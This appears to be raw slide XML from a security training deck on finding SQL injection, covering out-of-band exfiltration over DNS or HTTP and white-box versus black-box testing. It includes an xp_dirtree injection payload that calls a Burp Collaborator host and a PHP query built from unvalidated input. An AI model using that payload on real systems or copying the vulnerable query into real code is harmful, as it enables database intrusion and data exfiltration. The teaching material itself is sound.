              <a:rPr dirty="0" sz="4600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>connection </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>system </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-730">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>control.</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Not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155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>common</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-345">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>variety </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>protocols </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-415">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DNS,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-420">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-409">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP)</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="1495"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Payload:</a:t>
            </a:r>
            <a:endParaRPr sz="4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7884" y="6766809"/>
            <a:ext cx="15565119" cy="38100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3175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250"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="491490" algn="l"/>
                <a:tab pos="1185545" algn="l"/>
                <a:tab pos="3820795" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1950" spc="630">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>';	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1950" spc="55">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exec	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1950" spc="210">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>master..xp_dirtree	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1950" spc="165">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--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817964" y="207951"/>
            <a:ext cx="8285480" cy="11101070"/>
            <a:chOff x="11817964" y="207951"/>
            <a:chExt cx="8285480" cy="11101070"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11817964" y="207951"/>
              <a:ext cx="8285480" cy="11101070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8285480" h="11101070">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8284878" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8284878" y="11100604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="111006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806490" y="3480522"/>
              <a:ext cx="4716924" cy="46113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9381" y="4546741"/>
            <a:ext cx="8170545" cy="253873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250" spc="-195" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>HOW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-1110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TO </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-750">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FIND </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-985">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLI  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-930">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITIES?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463" y="1139950"/>
            <a:ext cx="10929620" cy="12084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750" spc="-285"/>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7750" spc="-295"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7750" spc="-830"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7750" spc="-350"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="77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8928" y="2904070"/>
            <a:ext cx="9203055" cy="7296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600" spc="-275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Depends </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>perspective </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-575">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>testing.</a:t>
            </a:r>
            <a:endParaRPr sz="4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01887" y="4653010"/>
            <a:ext cx="3645535" cy="3141345"/>
            <a:chOff x="3001887" y="4653010"/>
            <a:chExt cx="3645535" cy="3141345"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3017594" y="5446148"/>
              <a:ext cx="2836545" cy="2332355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2836545" h="2332354">
                  <a:moveTo>
                    <a:pt x="2836227" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2332274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2836227" y="2332274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2836227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853821" y="4668716"/>
              <a:ext cx="777875" cy="3110230"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="777875" h="3110229">
                  <a:moveTo>
                    <a:pt x="777421" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="777431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777421" y="2332274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777421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17594" y="4668716"/>
              <a:ext cx="3613785" cy="777875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3613784" h="777875">
                  <a:moveTo>
                    <a:pt x="3613649" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="777431" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="777431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2836227" y="777431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3613649" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5151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17594" y="4668716"/>
              <a:ext cx="3613785" cy="3110230"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3613784" h="3110229">
                  <a:moveTo>
                    <a:pt x="0" y="777429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="777429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3613652" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3613652" y="2332279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2836226" y="3109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="777429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3613784" h="3110229">
                  <a:moveTo>
                    <a:pt x="0" y="777429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2836226" y="777429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3613652" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3613784" h="3110229">
                  <a:moveTo>
                    <a:pt x="2836226" y="777429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2836226" y="3109706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2563461" y="8196474"/>
            <a:ext cx="2475230" cy="135763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405765" marR="5080" indent="-393700">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>White</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-360">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Box  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr sz="4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6148" y="8196474"/>
            <a:ext cx="2278380" cy="135763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07340" marR="5080" indent="-295275">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Black</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-360">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Box  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr sz="4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83189" y="4668716"/>
            <a:ext cx="3613785" cy="3110230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3613784" h="3110229">
                <a:moveTo>
                  <a:pt x="0" y="777429"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="777429" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3613652" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3613652" y="2332279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2836226" y="3109706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3109706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="777429"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3613784" h="3110229">
                <a:moveTo>
                  <a:pt x="0" y="777429"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2836226" y="777429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3613652" y="0"/>
                </a:lnTo>
              </a:path>
              <a:path w="3613784" h="3110229">
                <a:moveTo>
                  <a:pt x="2836226" y="777429"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2836226" y="3109706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391634" y="5622311"/>
            <a:ext cx="2428875" cy="2038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65">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;?php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Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="29845">
              <a:lnSpc>
                <a:spcPct val="106500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$offset </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$argv</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="145">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>beware, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>validation!</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="35560">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$query </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>products </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-185">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-204">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BY </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>LIMIT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>20  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-195">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OFFSET</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$offset</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>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300" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$result </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pg_query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$conn</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
